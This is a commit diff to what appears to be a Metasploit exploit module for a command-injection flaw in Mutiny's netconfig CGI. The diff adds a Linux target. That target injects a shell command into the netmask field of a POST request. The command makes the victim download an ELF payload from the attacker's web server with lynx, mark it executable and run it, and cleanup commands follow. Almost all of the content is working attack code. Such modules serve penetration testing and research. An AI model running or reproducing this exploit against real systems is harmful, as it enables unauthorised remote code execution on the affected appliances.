added linux native target

2013-03-07 19:12:25 +01:00 · 2013-03-07 19:12:25 +01:00 · fdd7c375ad
parent 03f3b06ccb
commit fdd7c375ad
1 changed files with 131 additions and 18 deletions
--- a/modules/exploits/unix/webapp/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/unix/webapp/mutiny_subnetmask_exec.rb
@ -11,6 +11,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Remote::HttpServer
 	include Msf::Exploit::EXE
 	def initialize(info = {})
 		super(update_info(info,
@ -37,21 +39,37 @@ class Metasploit3 < Msf::Exploit::Remote
 					['URL', 'http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html']
 				],
 			'Privileged'     => true,
 			'Platform'       => [ 'unix', 'linux' ],
 			'Payload'        =>
 				{
 					'DisableNops' => true,
-					'Space'       => 4000,
+					'Space'       => 4000
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
 							'RequiredCmd' => 'generic python',
 						}
 				},
-			'Platform'       => 'unix',
+			'Targets'        =>
 				[
 					[ 'Unix CMD',
 						{
 							'Arch' => ARCH_CMD,
-			'Targets'        => [[ 'Automatic', { }]],
+							'Platform' => 'unix',
 							#'Payload'        =>
 							#	{
 							#		'Compat'   =>
 							#			{
 							#				'PayloadType' => 'cmd',
 							#				'RequiredCmd' => 'python'
 							#			}
 							#	},
 						}
 					],
 					[ 'Linux Payload',
 						{
 							'Arch' => ARCH_X86,
 							'Platform' => 'linux'
 						}
 					]
 				],
 			'DisclosureDate' => 'Oct 22 2012',
-			'DefaultTarget' => 0))
+			'DefaultTarget' => 1))
 		register_options(
 			[
@ -65,9 +83,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		"#{rhost}:#{rport}"
 	end
 	def lookup_lhost()
 		# Get the source address
 		if datastore['SRVHOST'] == '0.0.0.0'
 			Rex::Socket.source_address('50.50.50.50')
 		else
 			datastore['SRVHOST']
 		end
 	end
 	def on_new_session(session)
-		return unless @netmask_eth0
+		cmds = []
 		print_status("#{peer} - Restoring Network information")
 		cmds = [
 			%Q|echo #{@netmask_eth0} > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
 			%Q|tr -d "\\n\\r" < /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak|,
@ -75,9 +101,76 @@ class Metasploit3 < Msf::Exploit::Remote
 			%Q|sed -e s/NETMASK=.*/NETMASK=#{@netmask_eth0}/ ifcfg-eth0 > ifcfg-eth0.bak|,
 			%Q|mv -f ifcfg-eth0.bak ifcfg-eth0|,
 			%Q|/etc/init.d/network restart|
-		]
+		] unless not @netmask_eth0
 		cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/
 		print_status("#{peer} - Restoring Network Information and Cleanup...")
 		begin
 			session.shell_command_token(cmds.join(" ; "))
-		print_good("#{peer} - Network information restored")
+		rescue
 			print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:")
 			cmds.each { |cmd|
 				print_warning(cmd)
 			}
 		end
 		print_good("#{peer} - Restoring and Cleanup successful")
 	end
 	def start_web_service
 		print_status("#{peer} - Setting up the Web Service...")
 		if datastore['SSL']
 			ssl_restore = true
 			datastore['SSL'] = false
 		end
 		resource_uri = '/' + @elfname + '.elf'
 		service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
 		print_status("#{peer} - Starting up our web service on #{service_url} ...")
 		start_service({'Uri' => {
 			'Proc' => Proc.new { |cli, req|
 				on_request_uri(cli, req)
 			},
 			'Path' => resource_uri
 		}})
 		datastore['SSL'] = true if ssl_restore
 		return service_url
 	end
 	# wait for the data to be sent
 	def wait_linux_payload
 		print_status("#{peer} - Waiting for the victim to request the ELF payload...")
 		waited = 0
 		while (not @elf_sent)
 			select(nil, nil, nil, 1)
 			waited += 1
 			if (waited > datastore['HTTP_DELAY'])
 				fail_with(Exploit::Failure::Unknown, "Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
 			end
 		end
 		#print_status("#{peer} - Giving time to the payload to execute...")
 		#select(nil, nil, nil, 20) unless session_created?
 		print_status("#{peer} - Shutting down the web service...")
 		stop_service
 	end
 	# Handle incoming requests from the target
 	def on_request_uri(cli, request)
 		vprint_status("#{peer} - on_request_uri called, #{request} requested")
 		if (not @elf_data)
 			print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!")
 			return
 		end
 		print_good("#{peer} - Sending the ELF payload to the target...")
 		@elf_sent = true
 		send_response(cli, @elf_data)
 	end
 	def check
@ -135,8 +228,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 		print_status("#{peer} - Exploiting Command Injection...")
 		if target.name =~ /CMD/
 			injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
 			injection << "; #{payload.encoded}"
 		else
 			print_status("#{peer} - Generating the ELF Payload...")
 			@elf_data = generate_payload_exe
 			@elfname = Rex::Text.rand_text_alpha(3+rand(3))
 			service_url = start_web_service
 			injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
 			injection << "; lynx -source \"#{service_url}\" > /tmp/#{@elfname}.elf"
 			injection << "; chmod +x /tmp/#{@elfname}.elf"
 			injection << "; /tmp/#{@elfname}.elf"
 		end
 		send_request_cgi({
 			'method'    => 'POST',
 			'uri'       => normalize_uri(target_uri.path, 'admin', 'cgi-bin', 'netconfig'),
@ -151,7 +258,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				"staticRouteNetmask" => static_route_netmask || rand_text_alpha(5 + rand(3)),
 				"staticRouteGateway" => static_route_gateway || rand_text_alpha(5 + rand(3))
 			}
-		})
+		}, 1)
 		if target.name =~ /Linux Payload/
 			wait_linux_payload
 		end
 	end
 end